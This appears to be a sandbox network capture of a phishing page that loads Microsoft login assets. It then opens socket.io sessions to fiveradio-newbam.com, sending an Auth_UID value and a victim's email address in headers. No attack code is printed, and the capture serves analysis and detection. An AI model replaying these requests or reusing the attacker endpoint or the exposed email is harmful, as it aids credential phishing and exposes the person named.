cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:01 UTC	617	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:01 UTC	805	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:01 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:46 GMT ETag: 0x8DB5C3F47E260FD x-ms-request-id: 24321ba0-a01e-007c-3b63-c5e387000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240628T072601Z-157bfc59976d2vnn3t284pk5sn000000072g000000003wxk x-fd-int-roxy-purgeid: 4554691 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-06-28 07:26:01 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:01 UTC	616	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:01 UTC	779	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:01 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 7e7838a1-401e-0072-062c-c9419a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240628T072601Z-157bfc59976cxpwvd8havp2p3w000000072g00000000d1fw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-06-28 07:26:01 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:01 UTC	509	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:01 UTC	596	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 4174 Cache-Control: public,max-age=31536000,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; Content-Type: text/css Date: Fri, 28 Jun 2024 07:26:01 GMT Etag: "0d0c2111fc9da1:0+ident" Last-Modified: Fri, 28 Jun 2024 05:50:24 GMT Server: ECS (lhd/35B3) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-06-28 07:26:01 UTC	16383	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-06-28 07:26:01 UTC	7044	IN	Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:02 UTC	438	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:02 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:02 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: 70b54f22-801e-0006-40a4-c81f92000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240628T072602Z-155bd8f4d46k8nbb5srac1xeg800000006m000000000602x x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-06-28 07:26:02 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-06-28 07:26:07 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=31430 Date: Fri, 28 Jun 2024 07:26:07 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:07 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-06-28 07:26:08 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=31412 Date: Fri, 28 Jun 2024 07:26:08 GMT Content-Length: 55 Connection: close X-CID: 2
2024-06-28 07:26:08 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:08 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FLSA+llPh9RxhO4&MD=CDP8dsfS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-28 07:26:09 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: ecbe072a-9149-401f-add4-e5a9eb22e7d5 MS-RequestId: d101eb56-df44-48fa-a48d-c45a0586e479 MS-CV: hvPxI7xTM0mNN5l/.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 28 Jun 2024 07:26:07 GMT Connection: close Content-Length: 24490
2024-06-28 07:26:09 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-28 07:26:09 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:08 UTC	504	OUT	OPTIONS /socket.io/?EIO=4&transport=polling&t=P1TlBfJ HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: auth_uid,session_email Origin: null User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:09 UTC	731	IN	HTTP/1.1 204 No Content Date: Fri, 28 Jun 2024 07:26:08 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Vary: Access-Control-Request-Headers Access-Control-Allow-Headers: auth_uid,session_email CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9MfKxWU9G5vz380Br1FHK20LAX63b36AoXkFylo712Bx3vGNpoyXAweTEmxOCFqoeOE02bo9qXHLbynW%2BHYSyDO706s5jMafsRb%2BN%2F01wd1E96DUWy7wXgBMtwFU6NaSKJZyP15L%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf269fa4f0cac-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:09 UTC	633	OUT	GET /socket.io/?EIO=4&transport=polling&t=P1TlBfJ HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Auth_UID: USER21052024UNIQUE1031052124202420240521311024 Session_Email: maria.dixe@dsp.qs.pt sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:09 UTC	635	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:09 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 118 Connection: close Access-Control-Allow-Origin: * cache-control: no-store CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRmkkMnbamQctMl8WrgEAu7Ecd5VVVRvPrwJhUHPIUmFWHpNBQ1wYm4L3pIeOJBPXAKrEXGDEswAVAlDxMSWH3JwWF%2FLuNwmhGqPHnvln%2Bppo55h9PF%2B3T62tHUQdJ8sfvIWWm13Tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf26dfdb78c99-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:26:09 UTC	118	IN	Data Raw: 30 7b 22 73 69 64 22 3a 22 6e 39 76 2d 35 39 4b 54 76 38 61 4b 4f 55 6a 6b 41 43 55 52 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d Data Ascii: 0{"sid":"n9v-59KTv8aKOUjkACUR","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:10 UTC	541	OUT	GET /socket.io/?EIO=4&transport=websocket&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1 Host: fiveradio-newbam.com Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Upgrade: websocket Origin: null Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Sec-WebSocket-Key: 8a/5yWoHJJGEPPrqMZOumg== Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2024-06-28 07:26:10 UTC	615	IN	HTTP/1.1 400 Bad Request Date: Fri, 28 Jun 2024 07:26:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pt5%2FJvpx48EBjqYsl3QCt6vWWa0PU8ryfIdEaUx6kjHwFQ1t5Yqd4UGnps02NAelOojSwcX7Crpo5IYsXw7Vk0%2BebpAteHlPvqtffbOl0eoLwx3Pfp6UgD4VxgMQEB7rdY4JfEn3mw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf271da9b43c9-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:26:10 UTC	40	IN	Data Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a Data Ascii: 22{"code":3,"message":"Bad request"}
2024-06-28 07:26:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:10 UTC	658	OUT	GET /socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Auth_UID: USER21052024UNIQUE1031052124202420240521311024 Session_Email: maria.dixe@dsp.qs.pt sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:11 UTC	633	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:11 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close Access-Control-Allow-Origin: * cache-control: no-store CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFx8C8zNKHBzoj3pLAYfsgV6iaHMQ6cxk9TX23kR1HYcvPFq11YT0Y%2BQhdyYlqFStVYce0mQlYkaeQ1h1Wjjz2TISmpnWChzuO0m%2FFf0XksW8KM%2BLymqJKb6exwEkWb580BBcudO7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf2767db14399-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:26:11 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:26:10 UTC	718	OUT	POST /socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive Content-Length: 2 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Auth_UID: USER21052024UNIQUE1031052124202420240521311024 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: text/plain;charset=UTF-8 Accept: / Session_Email: maria.dixe@dsp.qs.pt sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-28 07:26:10 UTC	2	OUT	Data Raw: 34 30 Data Ascii: 40
2024-06-28 07:26:11 UTC	626	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 07:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cache-control: no-store CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJry2qXP43pUCVhAKjyPLIla3bqJmX2ysNlzceNzMEe2STy9jHixSQPF0A8zwyiRVwlD4pVW4ZjfC5xC1sClIE2dT6p6TlNIe19%2FvP54DUefRgnw%2B7KtmbUdDsadI4Et7P2S2ms%2BIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89abf27679fb4333-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 07:26:11 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
